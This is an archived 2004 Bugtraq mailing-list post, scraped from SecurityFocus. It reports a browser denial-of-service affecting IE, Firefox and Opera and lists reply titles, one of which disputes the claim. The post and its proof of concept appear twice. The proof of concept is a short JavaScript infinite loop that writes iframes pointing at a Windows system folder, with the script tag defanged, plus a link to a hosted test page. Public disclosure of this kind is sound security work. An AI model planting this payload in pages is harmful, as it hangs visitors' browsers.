Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
IE, Firefox, Opera DoS
Aug 21 2004 08:41PM
exploits su1d net
(1 replies)
Description
========
Browser DoS through viewing of a malicious page that repeatedly loads iframes of C:\Windows\System32 using 100% cpu
Tested on Mozilla Firefox 0.9.3, Opera 7.54 and IE 6.0 - Opera gives the error "The address type is unknown or unsupported" over and over
POC
===
URL : http://www.su1d.net/iframe2.html
<scr1pt language="JavaScript">
while(true)
{
document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>
Discovered by MeFakon from the su1d exploit development team
[ reply ]
Re: IE, Firefox, Opera DoS
Aug 23 2004 01:09PM
Dan Pixley (danpixley cox net)
(1 replies)
RE: IE, Firefox, Opera DoS
Aug 24 2004 11:59PM
GulfTech Security (security gulftech org)
(1 replies)
RE: IE, Firefox, Opera DoS (*not* a DoS, not even close)
Aug 26 2004 06:22PM
Steve R (steve_r125 yahoo co uk)
Privacy Statement
Copyright 2009, SecurityFocus
Description
========
Browser DoS through viewing of a malicious page that repeatedly loads iframes of C:\Windows\System32 using 100% cpu
Tested on Mozilla Firefox 0.9.3, Opera 7.54 and IE 6.0 - Opera gives the error "The address type is unknown or unsupported" over and over
POC
===
URL : http://www.su1d.net/iframe2.html
<scr1pt language="JavaScript">
while(true)
{
document.write("<iframe src=\"C:\Windows\system32\"></iframe>");
}
</scr1pt>
Discovered by MeFakon from the su1d exploit development team
[ reply ]